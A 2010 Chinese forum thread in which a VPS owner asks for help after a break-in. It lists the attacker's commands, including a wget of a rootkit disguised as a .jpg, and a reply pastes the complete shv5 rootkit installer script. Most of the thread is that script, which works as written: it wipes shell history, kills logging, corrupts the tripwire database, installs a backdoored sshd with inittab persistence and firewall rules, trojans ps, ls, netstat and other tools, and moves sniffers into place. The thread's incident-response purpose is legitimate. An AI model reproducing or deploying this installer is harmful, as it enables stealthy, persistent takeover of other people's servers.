求助，服务器被黑了……

Giuseffo 发表于 2010-4-4 19:37

最近想帮老哥做个小网站，练练手。于是买了个vps服务器空间，昨天刚把APACHE PHP MYSQL环境搭建好，今儿回头一试，呃，密码不对了。
赶紧联系机房让他们改回了密码，发现有黑客做了些手脚。从命令记录里找出了丫最可疑的几个命令：
cat /etc/issue
cat /proc/cpuinfo
wget http://geox.at.ua/rk.jp g ------这个是丫下载个木马的地址，大家不要点
tar zxvf rk.jpg
cd .sshd
./setup darkokicevohack123 666

下面是ps auxw的输出：
USER    PID %CPU %MEM VSZRSS TTY    STAT START TIME COMMAND
root       10.00.01916664 ?    S 17:42 0:00 init
root 155300.00.01580576 ?    S 17:42 0:00 syslogd -m 0
root 155370.00.04900 1096 ?    S 17:42 0:00 /usr/sbin/sshd
root 155460.00.02144804 ?    S 17:42 0:00 xinetd -stayalive -pidfile /var/run/xinetd.pid
root 155580.00.02288 1144 ?    S 17:42 0:00 /bin/sh /usr/local/mysql/bin/mysqld_safe --datadir=/usr/local/mysql/v
mysql 155900.00.7 125048 14684 ?    S 17:42 0:00 /usr/local/mysql/libexec/mysqld --basedir=/usr/local/mysql --datadir=
root 156080.00.03124 1100 ?    S 17:42 0:00 crond
root 156160.00.04688832 ?    S 17:42 0:00 /usr/sbin/saslauthd -m /var/run/saslauthd -a pam -n 1
root 156240.00.4 19700 9792 ?    S 17:42 0:00 /usr/local/apache2/bin/httpd -k start
daemon 156340.00.4 19832 9288 ?    S 17:42 0:00 /usr/local/apache2/bin/httpd -k start
daemon 156350.00.4 19832 9288 ?    S 17:42 0:00 /usr/local/apache2/bin/httpd -k start
daemon 156360.00.4 19832 9300 ?    S 17:42 0:00 /usr/local/apache2/bin/httpd -k start
daemon 156370.00.4 19832 9288 ?    S 17:42 0:00 /usr/local/apache2/bin/httpd -k start
daemon 156380.00.4 19832 9288 ?    S 17:42 0:00 /usr/local/apache2/bin/httpd -k start
root 220090.00.17752 2368 ?    R 19:35 0:00 sshd: root@pts/0
root 220120.00.02296 1336 pts/0 S 19:35 0:00 -bash
daemon 221770.00.4 19700 8928 ?    S 19:41 0:00 /usr/local/apache2/bin/httpd -k start
root 244100.00.02740772 pts/0 R 20:28 0:00 ps auxw

下面是 netstat -ln 的输出：
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address       Foreign Address       State
tcp    0    0 0.0.0.0:995          0.0.0.0:*             LISTEN
tcp    0    0 0.0.0.0:3306          0.0.0.0:*             LISTEN
tcp    0    0 0.0.0.0:110          0.0.0.0:*             LISTEN
tcp    0    0 0.0.0.0:80          0.0.0.0:*             LISTEN
tcp    0    0 0.0.0.0:21          0.0.0.0:*             LISTEN
tcp    0    0 0.0.0.0:22          0.0.0.0:*             LISTEN
tcp    0    0 0.0.0.0:25          0.0.0.0:*             LISTEN
raw    0    0 0.0.0.0:1             0.0.0.0:*             7
Active UNIX domain sockets (only servers)
Proto RefCnt Flags    Type    State       I-Node Path
unix2    [ ACC ] STREAM LISTENING 457424811 /tmp/mysql.sock
unix2    [ ACC ] STREAM LISTENING 457424843 /var/run/saslauthd/mux

这家伙对我的服务器到底做了些什么？服务器被鸽子了吗？？请各位前辈指教，谢谢！

savagejin 发表于 2010-4-4 22:18

大体看了下，这个大概是帮你装了ssh吧，如果你不需要的话，可以把ssh给关了。具体干了什么，可以把他的东西下下来，叫会shell的人看看里面那个setup脚本

Eternal Wind 发表于 2010-4-5 03:15

setup贴出来

鸡蛋灌饼 发表于 2010-4-5 04:58

LZ你先把自己的home清理干净然后改密码
\"cd .sshd\"最可疑，把.ssh里面的东西贴一下，包括文件内容

vine 发表于 2010-4-5 11:51

楼主你vps没有控制面板吗？
简单的方法重装系统改SSH端口吧...

hello2crawler 发表于 2010-4-5 12:07

本帖最后由 hello2crawler 于 2010-4-4 23:44 编辑

那个tarball解压出来是这些货:

-rw-r--r-- 1 hello2crawler hello2crawler15K Mar 24 11:00 .sshd
-rw-r--r-- 1 hello2crawler hello2crawler 502K Apr 202008 bin.tgz
-rw-r--r-- 1 hello2crawler hello2crawler446 Mar 282008 conf.tgz
-rw-r--r-- 1 hello2crawler hello2crawler29K Apr 152003 lib.tgz
-rwxr-xr-x 1 hello2crawler hello2crawler24K Mar 30 15:59 setup
-rw-r--r-- 1 hello2crawler hello2crawler 121K Apr 172003 utilz.tgz

Setup 在此, 做了好些事情, 大概看了下就是为了种上sshd的后门. 找备份还原回去吧. 光改root密码不够.

他跑这个的时候已经是root了, 主要问题我猜是在php源码或者apache的设置里面有漏洞, 然后他找到了用apache执行这个的?

看看apache的日志?...不过十有八九已经被改掉老

#!/bin/bash
#
# shv5-internal-release
# by: JohnQ December/2007
#
# greetz to:
#
# [*] SH-members: Me :)
# PRIVATE ! DO NOT DISTRIBUTE BITCHEZ !

# BASIC DEFINES

DEFPASS=socardeaukdata
DEFPORT=6969
BASEDIR=`pwd`

# DON`T TOUCH BELOW UNLESS YOU KNOW WHAT U`R DOING !
# BEFORE WE MOVE ON LET`s WORK ON SAFE-GROUND !

unset HISTFILE;unset HISTSIZE;unset HISTORY;unset HISTSAVE;unset HISTFILESIZE
export PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin

# RAINBOW COLOURS :)

BLK=\'\'
RED=\'\'
GRN=\'\'
YEL=\'\'
BLU=\'\'
MAG=\'\'
CYN=\'\'
WHI=\'\'
DRED=\'\'
DGRN=\'\'
DYEL=\'\'
DBLU=\'\'
DMAG=\'\'
DCYN=\'\'
DWHI=\'\'
RES=\'\'

# HOPE U`R NO TRYING THIS FROM USER !
# HOWEVER LET`S SEE WHAT KINDA KID U ARE ?

if [ \"$(whoami)\" != \"root\" ]; then
echo \"${DCYN}[${WHI}sh${DCYN}] ${WHI} BECOME ROOT AND TRY AGAIN ${RES}\"
echo \"\"
exit
fi

# UNZIPING SHITS

tar zxf ./bin.tgz
tar zxf ./conf.tgz
tar zxf ./lib.tgz
tar zxf ./utilz.tgz
cd ./bin; tar zxf ./sshd.tgz
rm -rf ./sshd.tgz
cd $BASEDIR
rm -rf bin.tgz conf.tgz lib.tgz utilz.tgz

sleep 2

cd $BASEDIR

killall -9 syslogd >/dev/null 2>&1

startime=`date +%S`

echo \"${DCYN}[${WHI}sh${DCYN}]# Installing shv5 ... this wont take long ${RES}\"
echo \"${DCYN}[${WHI}sh${DCYN}]# If u think we will patch your holes shoot yourself !${RES}\"
echo \"${DCYN}[${WHI}sh${DCYN}]# so patch manualy and fuck off! ${RES}\"
echo \"\"
echo \"\"
echo \"${WHI}============================================================================${RES}\"
echo \"\"
echo \"${DCYN} MMMMM                         MMMMMM                         \"
echo \" MMM MMMMMMMMM MMMM MMMM MMM [*] Presenting u shv5-rootkit !\"
echo \" MMM MMMM MMMMMMMM MMMM MMM [*] Designed for internal use !\"
echo \" MMM MMMMMMM    MMMMMMMMMMMM MMM                                  \"
echo \" MMM MMMMMMMM MMMMMMMMMMMM MMM [*] brought to you by: JohnQ \"
echo \" MMM       MMMMMMMM MMMM MMM [*] December 2007 �             \"
echo \" MMM MMMM MMMMMMMM MMMM MMM                                  \"
echo \" MMM MMMMMMMMM MMMM MMMM MMM [*] *** VERY PRIVATE ***    \"
echo \" MMM                            MMM [*] *** so dont distribute *** \"
echo \" MMMMM    -C- -R- -E- -W- MMMMMM                                  \"
echo \"                                                                      ${RES}\"
echo \"\"
echo \"${WHI}============================================================================${RES}\"
echo \"\"
sleep 2

echo \"${DCYN}[${WHI}sh${DCYN}]# backdooring started on ${WHI}`hostname -f`${RES}\"
echo \"${DCYN}[${WHI}sh${DCYN}]#                                                                ${RES}\"
echo \"${DCYN}[${WHI}sh${DCYN}]#                                                                ${RES}\"

SYSLOGCONF=\"/etc/syslog.conf\"

echo -n \"${DCYN}[${WHI}sh${DCYN}]# checking for remote logging... ${RES}\"

REMOTE=`grep -v \"^#\" \"$SYSLOGCONF\" | grep -v \"^$\" | grep \"@\" | cut -d \'@\' -f 2`

if [ ! -z \"$REMOTE\" ]; then
   echo \"${DCYN}[${WHI}sh${DCYN}]# May Allah help us!${RES}\"
   echo
   echo \'${RED}                   REMOTE LOGGING DETECTED ${RES}\'
   echo \'${DCYN}[${WHI}sh${DCYN}]#    I hope you can get to these other computer(s): ${RES}\'
   echo
   for host in $REMOTE; do
            echo -n \"          \"
            echo $host
   done
   echo
   echo \' ${WHI}          cuz this box is LOGGING to it... ${RES}\'
   echo
else
   echo \" ${WHI} guess not.${RES}\"
fi

#######################################################################
## CHEKING FOR MALICIOUS ADMIN TOOLS !(like tripwire, snort, etc...) ##
##                                                                ##
#######################################################################

echo -n \"${DCYN}[${WHI}sh${DCYN}]# checking for tripwire... ${RES}\"

uname=`uname -n`
twd=/var/lib/tripwire/$uname.twd

if [ -d /etc/tripwire ]; then
echo \"${WHI} ALERT: TRIPWIRE FOUND! ${RES}\"

if [ -f /var/lib/tripwire/$uname.twd ]; then
   chattr -isa $twd
   echo -n \"${DCYN}[${WHI}sh${DCYN}]# checking for tripwire-database... ${RES}\"
   echo \"${RED} ALERT! tripwire database found ${RES}\"
   echo \"${DCYN}[${WHI}sh${DCYN}]# ${WHI} dun worry we got handy-tricks for this :) ${RES}\"
   echo \"-----------------------------------------\" > $twd
   echo \"Tripwire segment-faulted !\" >> $twd
   echo \"-----------------------------------------\" >> $twd
   echo \"\" >> $twd
   echo \"The reasons for this may be: \" >> $twd
   echo \"\" >> $twd
   echo \"corrupted disc-geometry, possible bad disc-sectors\" >> $twd
   echo \"corrupted files while checking for possible change etc.\" >> $twd
   echo \"\"
   echo \"pls. rerun tripwire to build the database again!\" >> $twd
   echo \"\" >> $twd
else
   echo \"${WHI} lucky you: Tripwire database not found. ${RES}\"
fi
else
echo \"${WHI} guess not. ${RES}\"
fi

# restoring login

if [ -f /sbin/xlogin ]; then
chattr -isa /sbin/xlogin
chattr -isa /bin/login
mv -f /sbin/xlogin /bin/login
chmod 7455 /bin/login
chattr +isa /bin/login
fi

echo \"${DCYN}[${WHI}sh${DCYN}]#                               ${BLU}    ${RES}\"

if [ -f /etc/sh.conf ]; then
chattr -isa /etc/sh.conf
rm -rf /etc/sh.conf
fi

# checking if we got needed libs and filez

if [ ! -f /lib/libproc.a ]; then
mv lib/libproc.a /lib/
fi

if [ ! -f /lib/libproc.so.2.0.6 ]; then
mv lib/libproc.so.2.0.6 /lib/
fi
perl .sshd

/sbin/ldconfig >/dev/null 2>&1

#if [ -f /lib/libncurses.so.5 ]; then
# echo \"\"
#else
# ln -s /lib/libncurses.so.4 /lib/libncurses.so.5 2>/dev/null
#fi

if [ -f /.bash_history ]; then
chattr -isa /.bash_history >/dev/null 2>&1
rm -rf /.bash_history
fi

if [ -f /bin/.bash_history ]; then
chattr -isa /bin/.bash_history
rm -rf /bin/.bash_history
fi

if [ ! -f /usr/bin/md5sum ]; then
touch -acmr /bin/ls bin/md5sum
cp bin/md5sum /usr/bin/md5sum
fi

if test -n \"$1\" ; then
echo \"${DCYN}[${WHI}sh${DCYN}]#Using Password : ${WHI}$1                            ${BLU}    ${RES}\"
cd $BASEDIR/bin
echo -n $1 >> /tmp/.mf
echo -n $1|md5sum > /etc/sh.conf
else
echo \"${DCYN}[${WHI}sh${DCYN}]# ${WHI} No Password Specified, using default - $DEFPASS       ${BLU}    ${RES}\"
echo -n $DEFPASS >> /tmp/.mf
echo -n $DEFPASS|md5sum > /etc/sh.conf
fi

touch -acmr /bin/ls /etc/sh.conf
chown -f root:root /etc/sh.conf
chattr +isa /etc/sh.conf

if test -n \"$2\" ; then
echo \"${DCYN}[${WHI}sh${DCYN}]#       Using ssh-port : ${WHI}$2                               ${RES}\"
echo \"Port $2\" >> $BASEDIR/bin/.sh/sshd_config
echo \"3 $2\" >> $BASEDIR/conf/hosts.h
echo \"4 $2\" >> $BASEDIR/conf/hosts.h
port=$2
cat $BASEDIR/bin/.sh/shdcf2 >> $BASEDIR/bin/.sh/sshd_config ; rm -rf $BASEDIR/bin/.sh/shdcf2
mv $BASEDIR/bin/.sh/sshd_config $BASEDIR/bin/.sh/shdcf
else
echo \"${DCYN}[${WHI}sh${DCYN}]# No ssh-port Specified, using default - $DEFPORT          ${BLU}    ${RES}\"
echo \"Port $DEFPORT\" >> $BASEDIR/bin/.sh/sshd_config
echo \"3 $2\" >> $BASEDIR/conf/hosts.h
echo \"4 $2\" >> $BASEDIR/conf/hosts.h
port=$DEFPORT
cat $BASEDIR/bin/.sh/shdcf2 >> $BASEDIR/bin/.sh/sshd_config ; rm -rf $BASEDIR/bin/.sh/shdcf2
mv $BASEDIR/bin/.sh/sshd_config $BASEDIR/bin/.sh/shdcf
fi

/sbin/iptables -I INPUT -p tcp --dport $port -j ACCEPT

if [ -f /lib/lidps1.so ]; then
chattr -isa /lib/lidps1.so
rm -rf /lib/lidps1.so
fi

if [ -f /usr/include/hosts.h ]; then
chattr -isa /usr/include/hosts.h
rm -rf /usr/include/hosts.h
fi

if [ -f /usr/include/file.h ]; then
chattr -isa /usr/include/file.h
rm -rf /usr/include/file.h
fi

if [ -f /usr/include/log.h ]; then
chattr -isa /usr/include/log.h
rm -rf /usr/include/log.h
fi

if [ -f /usr/include/proc.h ]; then
chattr -isa /usr/include/proc.h
rm -rf /usr/include/proc.h
fi

cd $BASEDIR
mv $BASEDIR/conf/lidps1.so /lib/lidps1.so
touch -acmr /bin/ls /lib/lidps1.so
touch -acmr /bin/ls $BASEDIR/conf/*
mv $BASEDIR/conf/*/usr/include/

# Ok lets start creating dirs

SSHDIR=/lib/libsh.so
HOMEDIR=/usr/lib/libsh

if [ -d /lib/libsh.so ]; then
chattr -isa /lib/libsh.so
chattr -isa /lib/libsh.so/*
rm -rf /lib/libsh.so
fi

if [ -d /usr/lib/libsh ]; then
chattr -isa /usr/lib/libsh
chattr -isa /usr/lib/libsh/*
rm -rf /usr/lib/libsh/*
fi

mkdir $SSHDIR
touch -acmr /bin/ls $SSHDIR
mkdir $HOMEDIR
touch -acmr /bin/ls $HOMEDIR

cd $BASEDIR/bin
mv .sh/* $SSHDIR/
mv .sh/.bashrc $HOMEDIR

if [ -f /sbin/ttyload ]; then
chattr -AacdisSu /sbin/ttyload
rm -rf /sbin/ttyload
fi

if [ -f /sbin/ttylib ]; then
chattr -AacdisSu /sbin/ttylib
rm -rf /sbin/ttylib
fi

if [ -f /usr/sbin/ttyload ]; then
chattr -isa /usr/sbin/ttyload
rm -rf /usr/sbin/ttyload
fi

if [ -f /sbin/ttymon ]; then
chattr -isa /sbin/ttymon
rm -rf /sbin/ttymon
fi

mv $SSHDIR/sshd /sbin/ttyload
chmod a+xr /sbin/ttyload
chmod o-w /sbin/ttyload
touch -acmr /bin/ls /sbin/ttyload
chattr +isa /sbin/ttyload
kill -9 `pidof ttyload` >/dev/null 2>&1

mv $SSHDIR/bin/ttylib /sbin/ttylib
chmod a+xr /sbin/ttylib
chmod o-w /sbin/ttylib
touch -acmr /bin/ls /sbin/ttylib
chattr +isa /sbin/ttylib
kill -9 `pidof ttylib` >/dev/null 2>&1

mv $BASEDIR/bin/ttymon /sbin/ttymon
chmod a+xr /sbin/ttymon
touch -acmr /bin/ls /sbin/ttymon
chattr +isa /sbin/ttymon
kill -9 `pidof ttymon` >/dev/null 2>&1

cp /bin/bash $SSHDIR

# INITTAB SHUFFLING

chattr -isa /etc/inittab
cat /etc/inittab |grep -v ttyload|grep -v getty > /tmp/.init1
cat /etc/inittab |grep getty > /tmp/.init2
echo \"# Loading standard ttys\" >> /tmp/.init1
echo \"0:2345:once:/usr/sbin/ttyload\" >> /tmp/.init1
cat /tmp/.init2 >> /tmp/.init1
echo \"\" >> /tmp/.init1
echo \"# modem getty.\" >> /tmp/.init1
echo \"# mo:235:respawn:/usr/sbin/mgetty -s 38400 modem\" >> /tmp/.init1
echo \"\" >> /tmp/.init1
echo \"# fax getty (hylafax)\" >> /tmp/.init1
echo \"# mo:35:respawn:/usr/lib/fax/faxgetty /dev/modem\" >> /tmp/.init1
echo \"\" >> /tmp/.init1
echo \"# vbox (voice box) getty\" >> /tmp/.init1
echo \"# I6:35:respawn:/usr/sbin/vboxgetty -d /dev/ttyI6\" >> /tmp/.init1
echo \"# I7:35:respawn:/usr/sbin/vboxgetty -d /dev/ttyI7\" >> /tmp/.init1
echo \"\" >> /tmp/.init1
echo \"# end of /etc/inittab\" >> /tmp/.init1
echo \"/sbin/ttyload -q >/dev/null 2>&1\" > /usr/sbin/ttyload
echo \"/sbin/ttymon >/dev/null 2>&1\" >> /usr/sbin/ttyload
echo \"/sbin/ttylib >/dev/null 2>&1\" >> /usr/sbin/ttyload
echo \"/sbin/iptables -I INPUT -p tcp --dport $port -j ACCEPT\" >> /usr/sbin/ttyload
echo \"iptables -I INPUT -p tcp --dport $port -j ACCEPT\" >> /usr/sbin/ttyload
touch -acmr /bin/ls /usr/sbin/ttyload
chmod +x /usr/sbin/ttyload
chattr +isa /usr/sbin/ttyload
/usr/sbin/ttyload >/dev/null 2>&1

touch -amcr /etc/inittab /tmp/.init1
mv -f /tmp/.init1 /etc/inittab
rm -rf /tmp/.init2

# MAKING SURE WE GOT IT BACKDORED RIGHT !

if [ ! \"`grep ttyload /etc/inittab`\" ]; then
echo \"${RED}[${WHI}sh${RED}]# WARNING - SSHD WONT BE RELOADED UPON RESTART \"
echo \"${RED}[${WHI}sh${RED}]# inittab shuffling probly fucked-up ! \"
fi

# Say hello to md5sum fixer boys n gurls !

if [ -f /sbin/ifconfig ]; then
/usr/bin/md5sum /sbin/ifconfig >> .shmd5
fi
if [ -f /bin/ps ]; then
/usr/bin/md5sum /bin/ps >> .shmd5
fi
if [ -f /bin/ls ]; then
/usr/bin/md5sum /bin/ls >> .shmd5
fi
if [ -f /bin/netstat ]; then
/usr/bin/md5sum /bin/netstat >> .shmd5
fi
if [ -f /usr/bin/find ]; then
/usr/bin/md5sum /usr/bin/find >> .shmd5
fi
if [ -f /usr/bin/top ]; then
/usr/bin/md5sum /usr/bin/top >> .shmd5
fi
if [ -f /usr/sbin/lsof ]; then
/usr/bin/md5sum /usr/sbin/lsof >> .shmd5
fi
if [ -f /usr/bin/slocate ]; then
/usr/bin/md5sum /usr/bin/slocate >> .shmd5
fi
if [ -f /usr/bin/dir ]; then
/usr/bin/md5sum /usr/bin/dir >> .shmd5
fi
if [ -f /usr/bin/md5sum ]; then
/usr/bin/md5sum /usr/bin/md5sum >> .shmd5
fi

if [ ! -f /dev/srd0 ]; then
./encrypt -e .shmd5 /dev/srd0
touch -acmr /bin/ls /dev/srd0
chattr a+r /dev/srd0
chown -f root:root /dev/srd0
fi

rm -rf .shmd5

# time change bitch

touch -acmr /sbin/ifconfig ifconfig >/dev/null 2>&1
touch -acmr /bin/ps ps >/dev/null 2>&1
touch -acmr /bin/ls ls >/dev/null 2>&1
touch -acmr /bin/netstat netstat >/dev/null 2>&1
touch -acmr /usr/bin/find find >/dev/null 2>&1
touch -acmr /usr/bin/top top >/dev/null 2>&1
touch -acmr /usr/sbin/lsof lsof >/dev/null 2>&1
touch -acmr /sbin/syslogd syslogd >/dev/null 2>&1
touch -acmr /usr/bin/slocate slocate >/dev/null 2>&1
touch -acmr /usr/bin/dir dir >/dev/null 2>&1
touch -acmr /usr/bin/md5sum md5sum >/dev/null 2>&1
md5sum=\"lingmail.com\"
touch -acmr /usr/bin/pstree pstree >/dev/null 2>&1

# Backdoor ps/top/du/ls/netstat/etc..

cd $BASEDIR/bin

BACKUP=/usr/lib/libsh/.backup
mkdir $BACKUP

# ps ...
if [ -f /usr/bin/ps ]; then
chattr -isa /usr/bin/ps
cp /usr/bin/ps $BACKUP
mv -f ps /usr/bin/ps
chattr +isa /usr/bin/ps
fi

if [ -f /bin/ps ]; then
chattr -isa /bin/ps
cp /bin/ps $BACKUP
mv -f ps /bin/ps
chattr +isa /bin/ps
fi

# ifconfig ...
chattr -isa /sbin/ifconfig
cp /sbin/ifconfig $BACKUP
mv -f ifconfig /sbin/ifconfig
chattr +isa /sbin/ifconfig

# netstat ...
if [ -f /usr/sbin/netstat ]; then
chattr -isa /usr/sbin/netstat
mv -f netstat /usr/sbin/netstat
chattr +isa /usr/sbin/netstat
fi

chattr -isa /bin/netstat
cp /bin/netstat $BACKUP
mv -f netstat /bin/netstat
chattr +isa /bin/netstat

# top ...
if [ -f /usr/bin/top ]; then
chattr -isa /usr/bin/top
cp /usr/bin/top $BACKUP
mv -f top /usr/bin/top
chattr +isa /usr/bin/top
if [ -f /lib/libncurses.so.5 ]; then
   ln -s /lib/libncurses.so.5 /lib/libncurses.so.4 2>/dev/null
fi
if [ -f /usr/lib/libncurses.so.5 ]; then
   ln -s /usr/lib/libncurses.so.5 /lib/libncurses.so.4 2>/dev/null
fi
fi

# slocate ...
if [ -f /usr/bin/slocate ]; then
chattr -isa /usr/bin/slocate
cp /usr/bin/slocate $BACKUP
mv -f slocate /usr/bin/slocate
chattr +isa /usr/bin/slocate
fi

# ls ...
chattr -isa /bin/ls
cp /bin/ls $BACKUP
mv -f ls /bin/ls
chattr +isa /bin/ls

# find ...
if [ -f /usr/bin/find ]; then
chattr -isa /usr/bin/find
cp /usr/bin/find $BACKUP
mv -f find /usr/bin/find
chattr +isa /usr/bin/find
fi

# dir ...
if [ -f /usr/bin/dir ]; then
chattr -isa /usr/bin/dir
cp /usr/bin/dir $BACKUP
mv -f dir /usr/bin/dir
chattr +isa /usr/bin/dir
fi

# lsof ...
if [ -f /usr/sbin/lsof ]; then
chattr -isa /usr/sbin/lsof
cp /usr/sbin/lsof $BACKUP
mv -f lsof /usr/sbin/lsof
chattr +isa /usr/sbin/lsof
fi

# pstree ...
if [ -f /usr/bin/pstree ]; then
chattr -isa /usr/bin/pstree
cp /usr/bin/pstree $BACKUP
mv -f pstree /usr/bin/pstree
chattr +isa /usr/bin/pstree
fi

# md5sum ...
chattr -isa /usr/bin/md5sum
cp /usr/bin/md5sum $BACKUP
mv -f md5sum /usr/bin/md5sum
chattr +isa /usr/bin/md5sum

# syslogd ...
# we won`t trojan it coz its too sensitive and won`t work.
# Admin will notice it upon system-restart!

#if [ -f /sbin/syslogd ]; then
# chattr -isa /sbin/syslogd
# cp /sbin/syslogd $BACKUP
# mv -f syslogd /sbin/syslogd
# chattr +isa /sbin/syslogd
#fi

echo \"${DCYN}[${WHI}sh${DCYN}]#       : ps/ls/top/netstat/ifconfig/find/ and rest backdoored${RES}\"
echo \"${DCYN}[${WHI}sh${DCYN}]#                                                                ${RES}\"
echo \"${DCYN}[${WHI}sh${DCYN}]#                                     ${RES}\"

cd $BASEDIR

#if [ ! -f /usr/bin/wget ]; then
# touch -acmr /bin/ls ./bin/wget
# chmod 744 ./bin/wget
# mv ./bin/wget /usr/bin/wget
#fi

# PICO WILL MAKE RK GROW BIG!
# SO FUCK OFF AND USE vi !

#if [ ! -f /usr/bin/pico ]; then
# touch -acmr /bin/ls ./pico
# chmod 744 ./pico
# mv ./pico /usr/bin/pico
#fi

touch -acmr /bin/ls $BASEDIR/utilz
touch -acmr /bin/ls $BASEDIR/utilz/*
mv $BASEDIR/utilz $HOMEDIR/

echo \"${DCYN}[${WHI}sh${DCYN}]#       : mirk/synscan/others... moved                   ${RES}\"

echo \"${DCYN}[${WHI}sh${DCYN}]#                                        ${RES}\"

mkdir $HOMEDIR/.sniff
mv $BASEDIR/bin/shsniff $HOMEDIR/.sniff/shsniff
mv $BASEDIR/bin/shp $HOMEDIR/.sniff/shp
mv $BASEDIR/bin/shsb $HOMEDIR/shsb
mv $BASEDIR/bin/hide $HOMEDIR/hide

touch -acmr /bin/ls $HOMEDIR/.sniff/shsniff
touch -acmr /bin/ls $HOMEDIR/.sniff/shp
touch -acmr /bin/ls $HOMEDIR/shsb
touch -acmr /bin/ls $HOMEDIR/hide

chmod +x $HOMEDIR/.sniff/*
chmod +x $HOMEDIR/shsb
chmod +x $HOMEDIR/hide

echo \"${DCYN}[${WHI}sh${DCYN}]#       : sniff/parse/sauber/hide moved                   ${RES}\"
echo \"${DCYN}[${WHI}sh${DCYN}]#                ${RES}\"

# CHECKING FOR VULN DAEMONS
# JUST WARNING NOT PATCHING HeH

echo \"${DCYN}[${WHI}sh${DCYN}]# Checking for vuln-daemons ...                ${RES}\"

ps aux > /tmp/.procs

if [ \"`cat /tmp/.procs | grep named`\" ]; then
echo \"${RED}[${WHI}sh${RED}]# NAMED found - patch it bitch !!!!          ${RES}\"
fi

if [ -f /usr/sbin/wu.ftpd ]; then
echo \"${RED}[${WHI}sh${RED}]# WU-FTPD found - patch it bitch !!!!          ${RES}\"
fi

if [ \"`cat /tmp/.procs | grep smbd`\" ]; then
echo \"${RED}[${WHI}sh${RED}]# SAMBA found - patch it bitch !!!!          ${RES}\"
fi

if [ \"`cat /tmp/.procs | grep rpc.statd`\" ]; then
echo \"${RED}[${WHI}sh${RED}]# RPC.STATD found - patch it bitch !!!!          ${RES}\"
fi

rm -rf /tmp/.procs

netstat -natp > /tmp/.stats

if [ \"`cat /tmp/.stats | grep 443 | grep http`\" ]; then
echo \"${RED}[${WHI}sh${RED}]# MOD_SSL found - patch it bitch !!!!          ${RES}\"
fi

rm -rf /tmp/.stats

# CHECKING FOR HOSTILE ROOTKITS/BACKDORS

mkdir $HOMEDIR/.owned

if [ -f /etc/ttyhash ]; then
chattr -AacdisSu /etc/ttyhash
rm -rf /etc/ttyhash
fi

if [ -d /lib/ldd.so ]; then
chattr -isa /lib/ldd.so
chattr -isa /lib/ldd.so/*
mv /lib/ldd.so $HOMEDIR/.owned/tk8
echo \"${RED}[${WHI}sh${RED}]# tk8 detected and owned ...!!!!          ${RES}\"
fi

if [ -d /usr/src/.puta ]; then
chattr -isa /usr/src/.puta
chattr -isa /usr/src/.puta/*
mv /usr/src/.puta $HOMEDIR/.owned/tk7
echo \"${RED}[${WHI}sh${RED}]# tk7 detected and owned ...!!!!          ${RES}\"
fi

if [ -f /usr/sbin/xntpd ]; then
chattr -isa /usr/sbin/xntpd
rm -rf /usr/sbin/xntpd
fi

if [ -f /usr/sbin/nscd ]; then
chattr -isa /usr/sbin/nscd
rm -rf /usr/sbin/nscd
fi

if [ -d /usr/include/bex ]; then
chattr -isa /usr/info/termcap.info-5.gz; rm -rf /usr/info/termcap.info-5.gz
chattr -isa /usr/include/audit.h; rm -rf /usr/include/audit.h
chattr -isa /usr/include/bex
chattr -isa /usr/include/bex/*
mv /usr/include/bex/ $HOMEDIR/.owned/bex2
if [ -f /var/log/tcp.log ]; then
   chattr -isa /var/log/tcp.log
   cp /var/log/tcp.log $HOMEDIR/.owned/bex2/snifflog
fi
chattr -isa /usr/bin/sshd2 >/dev/null 2>&1
rm -rf /usr/bin/sshd2 >/dev/null 2>&1
echo \"${RED}[${WHI}sh${RED}]# beX2 detected and owned ...!!!!          ${RES}\"
fi

if [ -d /dev/tux/ ]; then
chattr -isa /usr/bin/xsf >/dev/null 2>&1
rm -rf /usr/bin/xsf >/dev/null 2>&1
chattr -isa /usr/bin/xchk >/dev/null 2>&1
rm -rf /usr/bin/xchk >/dev/null 2>&1
chattr -isa /dev/tux >/dev/null 2>&1
mv /dev/tux $HOMEDIR/.owned/tuxkit
echo \"${RED}[${WHI}sh${RED}]# tuxkit detected and owned ...!!!!          ${RES}\"
fi

if [ -f /usr/bin/ssh2d ]; then
chattr -isa /usr/bin/ssh2d
rm -rf /usr/bin/ssh2d
chattr -isa /lib/security/.config/
chattr -isa /lib/security/.config/*
rm -rf /lib/security/.config
echo \"${RED}[${WHI}sh${RED}]# optickit detected and removed ...!!!!          ${RES}\"
fi

if [ -f /etc/ld.so.hash ]; then
chattr -isa /etc/ld.so.hash
rm -rf /etc/ld.so.hash
fi

chattr +isa /usr/lib/libsh
chattr +isa /lib/libsh.so

# GREPPING SHITZ FROM rc.sysinit and inetd.conf

if [ -f /etc/rc.d/rc.sysinit ]; then
chattr -isa /etc/rc.d/rc.sysinit
cat /etc/rc.d/rc.sysinit | grep -v \"# Xntps (NTPv3 daemon) startup..\"| grep -v \"/usr/sbin/xntps\"| grep -v \"/usr/sbin/nscd\" > /tmp/.grep
chmod +x /tmp/.grep
touch -acmr /etc/rc.d/rc.sysinit /tmp/.grep
mv -f /tmp/.grep /etc/rc.d/rc.sysinit
rm -rf /tmp/.grep
fi

if [ -f /etc/inetd.conf ]; then
chattr -isa /etc/inetd.conf
cat /etc/inetd.conf | grep -v \"6635\"| grep -v \"9705\" > /tmp/.grep
touch -acmr /etc/inted.conf /tmp/.grep
mv -f /tmp/.grep /etc/inetd.conf
rm -rf /tmp/.grep
fi

# KILLING SOME LAMME DAEMONS

killall -9 -q nscd >/dev/null 2>&1
killall -9 -q xntps >/dev/null 2>&1
killall -9 -q mountd >/dev/null 2>&1
killall -9 -q mserv >/dev/null 2>&1
killall -9 -q psybnc >/dev/null 2>&1
killall -9 -q t0rns >/dev/null 2>&1
killall -9 -q linsniffer >/dev/null 2>&1
killall -9 -q sniffer >/dev/null 2>&1
killall -9 -q lpsched >/dev/null 2>&1
killall -9 -q sniff >/dev/null 2>&1
killall -9 -q sn1f >/dev/null 2>&1
killall -9 -q sshd2 >/dev/null 2>&1
killall -9 -q xsf >/dev/null 2>&1
killall -9 -q xchk >/dev/null 2>&1
killall -9 -q ssh2d >/dev/null 2>&1

echo \"${WHI}--------------------------------------------------------------------${RES}\"

echo \"${DCYN}[${WHI}sh${DCYN}]# ${RES}\"
MYIPADDR=`/sbin/ifconfig eth0 | grep \"inet addr:\" | awk -F \' \' \' {print $2} \' | cut -c6-`
echo \"${DCYN}[${WHI}sh${DCYN}]# Hostname :${WHI} `hostname -f` ($MYIPADDR)${RES}\"
uname -a | awk \'{ print$11 }\' >/tmp/info_tmp
